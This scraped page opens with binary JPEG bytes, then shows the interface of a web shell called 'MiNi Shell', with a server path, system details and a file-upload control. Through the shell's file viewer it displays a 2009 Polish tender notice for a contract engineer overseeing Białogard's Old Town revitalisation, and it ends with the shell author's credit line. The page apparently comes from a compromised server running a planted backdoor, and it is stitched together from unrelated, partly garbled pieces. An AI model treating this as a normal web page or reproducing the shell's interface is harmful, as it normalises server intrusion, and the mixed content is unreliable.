JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090310/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090310/56368-N-2009.html

<p class="kh_header"><b>Białogard: Pełnienie funkcji Inżyniera Kontraktu zadania pn. Rewitalizacja Starego Miasta w Białogardzie - Etap II</b><br>
<b>Numer ogłoszenia: 56368 - 2009; data zamieszczenia: 10.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Białogard - Urząd Miasta Białogardu , ul. 1-go Maja 18, 78-200 Białogard, woj. zachodniopomorskie, tel. 094 3122310, faks 094 3122919.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bialogard.info</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie funkcji Inżyniera Kontraktu zadania pn. Rewitalizacja Starego Miasta w Białogardzie - Etap II.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wybór w drodze przetargu nieograniczonego podmiotu, któremu powierzona zostanie funkcja INŻYNIERA KONTRAKTU (zgodnie 
z ustawą Prawo zamówień publicznych w oparciu o procedury programu ZPORR 
i procedury FIDIC) przy realizacji zadania pn. Rewitalizacja Starego Miasta 
w Białogardzie - Etap II obejmującego swoim zakresem roboty budowlane związane z odrestaurowaniem i rewitalizacją zabytkowej części miasta Białogard.
Zadanie przewiduje:
- odtworzenie zabytkowego układu urbanistycznego w najstarszej części miasta poprzez wykonanie remontu dachów, ocieplenia i kolorystyki łącznie w 29 budynkach o walorach historyczno-architektonicznych, zlokalizowanych w obrębie białogardzkiego Starego Miasta, przy ulicach: Najświętszej Marii Panny (11budynków), Staromiejskiej (5 budynków), Grottgera (2 budynki), Lindego (3 budynki), Kopernika (5 budynków), Rycerskiej (2 budynki), Matejki (1 budynek);
- dopasowanie wyglądu zewnętrznego dróg i ciągów pieszych do zabytkowego charakteru tej części miasta (ul. Matejki, Najświętszej Marii Panny, Kościelna, Kopernika, Lindego, Reymonta, Rycerska, Siemiradzkiego oraz Staromiejska).
Wszystkie projekty techniczne związane z realizacją zadania zyskały pozytywną opinię Wojewódzkiego Konserwatora Zabytków. 
1.Zakres prac na podstawie dokumentacji projektowej przedstawia się następująco:
a)Renowacja elewacji 29 budynków 
- ul. Najświętszej Marii Panny (11 budynków - nr 3,4,5,6,7,11,12,13,14,21,22),
- ul. Staromiejska (5 budynków - nr 5,6-7,8,9-12-14/15,16),
- ul. Grottgera (2 budynki - nr 16,17),
- ul. Lindego (3 budynki - nr 5-6,8-9,19),
- ul. Kopernika (5 budynków - nr 3-4,5,8,10,11),
- ul. Rycerska (2 budynki - nr 2,11),
- ul. Matejki (1 budynek - nr 1).
b)Renowacja dachów 29 budynków
- ul. Najświętszej Marii Panny (11 budynków - nr 3,4,5,6,7,11,12,13,14,21,22),
- ul. Staromiejska (5 budynków - nr 5,6-7,8,9-12-14/15,16),
- ul. Grottgera (2 budynki - nr 16,17),
- ul. Lindego (3 budynki - nr 5-6,8-9,19),
- ul. Kopernika (5 budynków - nr 3-4,5,8,10,11),
- ul. Rycerska (2 budynki - nr 2,11),
- ul. Matejki (1 budynek - nr 1).
c)Renowacja dróg i ciągów pieszych o dł. około 13 500 m2- (ul. Matejki, Najświętszej Marii Panny, Kościelna, Kopernika, Lindego, Reymonta, Rycerska, Siemiradzkiego oraz Staromiejska).
- roboty przygotowawcze, rozbiórkowe i ziemne,
- roboty krawężnikowe, roboty nawierzchniowe.
2. Zakres zamówienia
Inżynier Kontraktu jako Inwestor Zastępczy zobowiązany będzie do nadzoru, kontroli i koordynacji wszelkich prac związanych z przygotowaniem, realizacją, zakończeniem i odbiorem końcowym inwestycji, a także odbiorem ostatecznym inwestycji oraz spełniać będzie obowiązki Inspektora Nadzoru Inwestorskiego, o których mowa w ustawie Prawo budowlane.

Zakres obowiązków Inżyniera Kontraktu
Inżynier Kontraktu będzie pełnił funkcję Inwestora Zastępczego i odpowiedzialny będzie za całość projektu, a jego obowiązki to:
1.Przygotowanie projektów umów związanych z realizacją inwestycji.
2.Opracowanie wniosków i przygotowanie dokumentów w celu uzyskania ewentualnych kredytów, pożyczek, dotacji, funduszy celowych i środków celowych z innych źródeł.
3.Przekazanie wykonawcy (wykonawcom) placu budowy.
4.Pełnienie nadzoru budowlanego i finansowego we wszystkich branżach.
Nadzór prowadzony będzie zgodnie z postanowieniami decyzji pozwolenia na budowę i zgłoszenia robót oraz przepisami polskiego Prawa Budowlanego.
-sprawdzanie jakości wykonanych robót i jakości wbudowanych materiałów budowlanych,
-sprawdzanie jakości, ilości i kosztów robót, dokonanie odbioru robót budowlanych ulegających zakryciu lub zanikających,
-opracowanie harmonogramu rzeczowo - finansowego robót i dokonywanie jego weryfikacji podczas realizacji zadania inwestycyjnego,
-kontrola postępu prac i robót wraz z ich kosztami,
-przygotowanie, prowadzenie i dokumentowanie narad i spotkań,
-opracowanie oraz przekazywanie inwestorowi niezbędnych dokumentów 
do uruchomienia finansowania inwestycji,
-dokonywanie czynności odbioru końcowego inwestycji lub jej odpowiedniej części określonej w umowie z wykonawcą i odbioru ostatecznego.
5.Przygotowywanie sprawozdań i raportów miesięcznych, kwartalnych, rocznych oraz na zakończenie inwestycji do Zachodniopomorskiego Urzędu Wojewódzkiego 
w Szczecinie o przebiegu inwestycji oraz po jej zakończeniu.
6.Inżynier Kontraktu zobowiązany jest do codziennego pobytu na placu budowy 
i w siedzibie Zamawiającego u pracownika odpowiedzialnego za realizację projektu .
W ramach tych czynności Inżynier Kontraktu zobowiązuje się do:
a)stwierdzania gotowości do odbioru,
b)dokonania odbiorów częściowych oraz odbioru końcowego od Wykonawcy oraz przekazania podmiotu odbioru do eksploatacji Inwestorowi lub wyznaczonemu przez niego użytkownikowi,
c)przekazanie Inwestorowi protokołów odbioru oraz dokumentacji powykonawczej,
d)dokonywanie przeglądów międzygwarancyjnych i odbioru ostatecznego po upływie terminu gwarancji ustalonego w umowie (umowach) z Wykonawcą (Wykonawcami),
e)obecności podczas kontroli zewnętrznych w trakcie realizacji zadania i po jego zakończeniu,
f)dokonanie czynności sprawdzenia kalkulacji szczegółowych lub kosztorysów przedkładanych przez Wykonawcę lub Wykonawców robót,
g)sprawdzenie faktur Wykonawcy oraz dokumentów załączonych do rozliczenia robót-inwestycji,
h)dochodzenie oraz egzekwowanie od wykonawców należytych odszkodowań lub kar umownych za nienależyte lub nieterminowe wykonanie zobowiązań umownych,
i)ustanowienia rezydenta do kontaktowania się z Inwestorem i odpowiedzialnego 
za realizacje robót..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9, 71.54.10.00-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1) O zamówienie mogą ubiegać się Wykonawcy, którzy spełniają następujące warunki:
a)nie podlegają wykluczeniu z postępowania na podstawie art. 24 ust. 1 i ust. 2 ustawy z dnia 29  stycznia  2004 r. Prawo  zamówień  publicznych (Dz. U. z 2007 r. Nr 223, poz. 1655 ze  zm.);
b)spełniają wymogi określone w art. 22 ust. 1  w/w ustawy;
c)spełniają wymagania określone w niniejszej Specyfikacji Istotnych Warunków Zamówienia (SIWZ, w tym określone w rozdziale III ust. 6 SIWZ - zawartość oferty, wymagane dokumenty);
d)posiadają osoby zdolne do wykonania przedmiotu zamówienia ,
e)złożą wymagane oświadczenia i dokumenty oraz pisemną ofertę wg formularza zawartego w SIWZ.
f)są uprawnieni do występowania w obrocie prawnym, zgodnie z wymaganiami ustawowymi.
g)posiadają uprawnienia niezbędne do wykonania określonych prac lub czynności 
w zakresie objętym zamówieniem.
h)znajdują się w sytuacji finansowej zapewniającej wykonanie zamówienia
i)posiadają pozytywne i udokumentowane /referencje/ doświadczenie w pełnieniu funkcji Inżyniera Kontraktu w ciągu ostatnich 3 latach, na co najmniej 2 inwestycji o koszcie końcowym nie mniejszym niż 5 mln zł. każda w zakresie obiektów budownictwa kubaturowego tj. budynków mieszkalnych lub użyteczności publicznej, oraz wykazać się doświadczeniem w realizacji w ostatnich 3 latach co najmniej 1 inwestycji budownictwa drogowego o pow. nie mniejszej niż 5.000 m2 o nawierzchni z kostki betonowej lub z kamienia. 
j)posiadają w okresie ostatnich trzech lat (tj. 2006-2008) przeciętne średnioroczne zatrudnienie co najmniej 12 osób z podaniem ich kwalifikacji, którzy będą wykonywać przedmiot zamówienia.
k)Znajdowanie się przez Wykonawcę w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia: Wykonawca musi spełnić łącznie następujące warunki:
- posiada w każdym z ostatnich trzech lat obrotowych (tj. 2006-2008) przychody własne z działalności w zakresie powiernictwa i nadzoru na poziomie minimum  - 800.000 zł za każdy rok (w załączeniu dokument potwierdzający),
- posiadać ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej     
działalności gospodarczej związanej z wykonaniem niniejszego zamówienia na kwotę 
1.500.000 zł.,   
- posiadać wdrożony system zarządzania ISO lub równoważny. 
2)  Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach (wymaganych przez Zamawiającego i podanych w SIWZ ) dołączonych do oferty. Z treści  załączonych dokumentów i oświadczeń musi wynikać jednoznacznie, iż Wykonawca spełnia wyżej wymienione warunki.
3)  Zamawiający na podstawie art. 26 ust. 3 ustawy Prawo zamówień publicznych
(Dz. U. z 2007 r. Nr 223, poz. 1655 ze zm.) wezwie Wykonawców, którzy w określonym terminie nie złożyli wymaganych przez Zamawiającego oświadczeń lub dokumentów potwierdzających spełnienie warunków udziału w postępowaniu, lub którzy nie złożyli pełnomocnictw, albo którzy złożyli wymagane przez Zamawiającego oświadczenia i dokumenty zawierające błędy, lub którzy złożyli wadliwe pełnomocnictwa, do ich złożenia w  wyznaczonym terminie, chyba że mimo ich złożenia oferta Wykonawcy podlega odrzuceniu albo konieczne byłoby unieważnienie postępowania..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Wykonawca zobowiązany jest wypełnić oraz załączyć następujące dokumenty, które stanowić będą załączniki do oferty według następującej kolejności:
1)formularz ofertowy według wzoru stanowiącego załącznik nr 1 (druk do wypełnienia) do SIWZ;
2)Oświadczenie, że nie podlegają wykluczeniu z postępowania na podstawie art. 24 ust. 1 i ust. 2 ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych (Dz. U. z 2007 r. Nr 223, poz. 1655 z późn.zm.) i oświadczenie, że spełnią wymogi z art. 22 ust. 1 w-w ustawy- załącznik nr 2 do SIWZ (druk do wypełnienia).
3)Wykaz pełnionych funkcji Inżyniera Kontraktu w ciągu ostatnich 3 latach, na co najmniej 2 inwestycji o koszcie końcowym nie mniejszym niż 5 mln zł. każda w zakresie obiektów budownictwa kubaturowego tj. budynków mieszkalnych lub użyteczności publicznej, oraz wykazać się doświadczeniem w realizacji w ostatnich 3 latach co najmniej 1 inwestycji budownictwa drogowego o pow. nie mniejszej niż 5.000 m2 o nawierzchni z kostki betonowej lub z kamienia. Wszystko potwierdzone referencjami. - załącznik nr 3 do SIWZ  (druk do wypełnienia).
4)Wykaz, że posiadają w okresie ostatnich trzech lat (tj. 2006-2008) przeciętne średnioroczne zatrudnienie co najmniej 12 osób z podaniem ich kwalifikacji, którzy będą wykonywać przedmiot zamówienia w tym:
- 4 branżowych inspektorów nadzoru, posiadających co najmniej 3 letnie doświadczenie w nadzorowaniu lub kierowaniu robotami w poszczególnych branżach - budowlana, drogowa,
- 1 osobę posiadającą doświadczenie w przygotowaniu dokumentacji przetargowej i procedur przetargowych,
- 1 osobę posiadającą doświadczenie w rozliczaniu inwestycji. 
Należy dołączyć zaświadczenia o posiadanych kwalifikacjach i dokumenty stwierdzające przynależności do właściwej izby samorządu zawodowego - załącznik nr 4 do SIWZ (druk do wypełnienia).  
5)Imienny wykaz osób upoważnionych do podejmowania czynności prawnych, 
w tym zaciągania zobowiązań skutkujących finansowo - załącznik nr 5.
6)Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie 
do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu 
do rejestru lub  zgłoszenia do ewidencji działalności gospodarczej, wystawionego 
nie wcześniej niż 6  miesięcy przed upływem terminu składania ofert - załącznik nr 6.
7)   Zaświadczenie z właściwego Urzędu Skarbowego potwierdzające, że Wykonawca nie zalega z opłacaniem podatków i opłat lub zaświadczenie, że uzyskał zgodę na zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji organu podatkowego. Zaświadczenie wystawione z datą  nie wcześniejszą niż 3 miesiące przed upływem terminu składania wniosków - załącznik nr 7.
8)  Zaświadczenie z właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczenie, że uzyskał zgodę na zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji organu podatkowego. Zaświadczenie wystawione z datą nie wcześniejszą niż 3 miesiące przed upływem terminu składania wniosków - załącznik nr 8.
9)Znajdowanie się przez Wykonawcę w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia: Wykonawca musi spełnić łącznie następujące warunki:
- posiada w każdym z ostatnich trzech lat obrotowych (tj. 2006-2008) przychody własne z działalności w zakresie powiernictwa i nadzoru na poziomie minimum  - 800.000 zł za każdy rok (w załączeniu dokument potwierdzający) - załącznik nr 9,
- posiadać ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej z wykonaniem niniejszego zamówienia na kwotę 1.500.000 zł. (w załączeniu przedłożyć polisę) - załącznik nr 10,   
- posiadać wdrożony system zarządzania ISO lub równoważny (w załączeniu przedłożyć dokument potwierdzający) - załącznik nr 11.
1)Dokumenty mogą zostać złożone w formie oryginałów lub kserokopii poświadczonych za zgodnością z oryginałem przez właściciela firmy lub uprawnionego przedstawiciela firmy. Zgodnie z art. 24 ust. 2 pkt. 2 ustawy Prawo zamówień publicznych.
2)Zamawiający wyklucza z postępowania Wykonawcę, jeśli stwierdzi, że dostarczone przez niego informacje istotne dla prowadzonego postępowania są nieprawdziwe.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.bialogard.info w dziale Zamóiwenia publiczne.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Białogard ul. 1 Maja 18, 78-200 Białogard pokój 216 w godz. 7.00 do 15.00.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.03.2009 godzina 09:00, miejsce: Urząd Miasta Białogard ul. 1 Maja 18, 78-200 Białogard pokój 224 (sekretariat).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> UWAGA: w razie zmniejszenia przez Zamawiającego zakresu wykonywanych robót budowlanych ulegnie zmianie wynagrodzenie Inżyniera Kontraktu stosownie o wielkość procentową pomniejszonego zakresu robót.

Projekt pn. Rewitalizacja Starego Miasta w Białogardzie - Etap II dofinansowany

Creat By MiNi SheLL
Email: jattceo@gmail.com